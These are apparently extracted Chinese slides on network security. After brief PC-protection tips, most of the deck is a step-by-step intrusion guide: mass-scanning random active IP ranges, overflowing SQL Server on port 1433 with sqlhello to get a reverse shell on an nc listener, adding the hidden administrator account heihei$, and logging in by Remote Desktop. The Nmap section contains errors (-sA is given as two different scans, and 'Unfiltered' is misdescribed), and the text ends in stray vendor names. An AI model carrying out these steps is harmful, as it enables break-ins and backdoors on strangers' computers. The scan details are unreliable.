网络安全实践篇.pptVIP

实践篇 网络安全 个人电脑安全基本防护 安装杀毒软件，可安装两个以上，同时查杀 安装个人防火墙 扫描系统漏洞，下载系统补丁 用户登录密码 入侵-扫描篇 准备工作：NT以上版本操作系统（XP,2000,2003,）;具有外网地址；关闭自带防火墙或者杀毒软件自带的防火墙 扫描方法：找到一段活跃的IP地址段（活动用户比较多）；扩大IP断，使用扫描工具（lan_port, portReady, s, superScan, x_way, windows NT自动攻击探测机）扫描。 入侵-入侵篇 常用入侵方式： sql-server溢出入侵 针对于开放1433端口的主机。 WINS 主机名服务溢出入侵 针对于开放42端口的主机。 sql空口令或是弱口令入侵 入侵-入侵篇（sql-server溢出入侵 ） S syn 54 54 1433 /save结果保存在 result.txt文件里，找到打开1433端口，把文件改名为1433.lst LScanPort 导入1433.lst，寻找3389端口开启的IP地址，保存导出到3389_1433.txt中，得到两个端口都打开的IP列表 入侵-入侵篇（sql-server溢出入侵 ） nc -vv -l -p 1234 在本机开启一个监听端口，可用批处理开启多个进程 sqlhello 目的IP 1433 本机IP 1234 攻击目的主机1433端口使溢出，并返回本机得到一个控制窗口，用批处理处理3389_1433.txt里那些同时打开两个端口的目的主机 入侵-入侵篇（sql-server溢出入侵 ） 在1234监听端口得到反应后，建立新用户net user heihei$ 355322 /add 加入超级用户组 net localgroup administrators heihei$ /add Ipconfig 得到对方IP 远程桌面连接该主机 用新用户及密码heihei$登录成功 常用命令 Ver 系统版本号 Dir/s /ah 查看包括子目录在内的文件，查看隐藏文件 Query user Net start 开启的服务 Net stop “服务名字” 停止服务 Net share 查看共享 NMAP扫描 Nmap是一款开放源代码的网络探测和安全审核的工具，基本包括了常用的扫描方式，并且提供了许多非常实用的辅助功能，以对目标主机做出进一步的侦测，如操作系统识别、进程用户分析以及众多可选的方式来逃避目标系统的监测等。Nmap可任意指定主机、网段甚至是整个网络作为扫描目标，扫描方式亦可通过添加合适的选项按需组合。 NMAP扫描 nmap [扫描类型] [选项] 主机或网络 #1……[#N] 在Nmap的所有参数中，只在目标参数是必须给出的，其最简单的形式是在命令行直接输入一个主机名或者一个IP地址。如果希望扫描某个IP地址的一个子网，可以在主机名或者IP地址的后面加上/掩码。掩码的范围是0（扫描整个网络）~32（只扫描这个主机）。使用/24扫描C类地址，/16扫描B类地址。 NMAP扫描 nmap [扫描类型] [选项] 主机或网络 #1……[#N] Ping扫描 端口扫描 隐蔽扫描 UDP扫描 操作系统识别 Ident扫描 NMAP扫描 nmap [扫描类型] [选项] 主机或网络 #1……[#N] -sT 表示TCP全连接扫描（TCP connect（））。 -sS 表示TCP半开扫描。 -sF 表示隐蔽FIN数据包扫描。 -sA 表示Xmas Tree扫描。 -sN 表示空（Null）扫描。 -sP 表示ping扫描。 -sU 表示UDP扫描。 -sA 表示ACK扫描。 -sW表示对滑动窗口的扫描。 -sR 表示RPC扫描。 -b 表示FTP反弹攻击（bounce attack）。 NMAP扫描 nmap [扫描类型] [选项] 主机或网络 #1……[#N] Nmap运行通常会得到被扫描主机端口的列表、Well-known端口的服务名（如果可能）、端口号、状态和协议等信息。每个端口有Open、Filtered和Unfiltered三种状态。Open状态意味着目标主机能够在这个端口使用Accept（）系统调用接受连接；Filtered状态表示防火墙、包过滤和其他的网络安全软件掩盖了这个端口，禁止Nmap探测其是否打开；Unfiltered表示这个端口关闭，并且没有防火墙/包过滤软件来隔离Nmap的探测企图。 AzureWare,Asustek,z-com,Wistron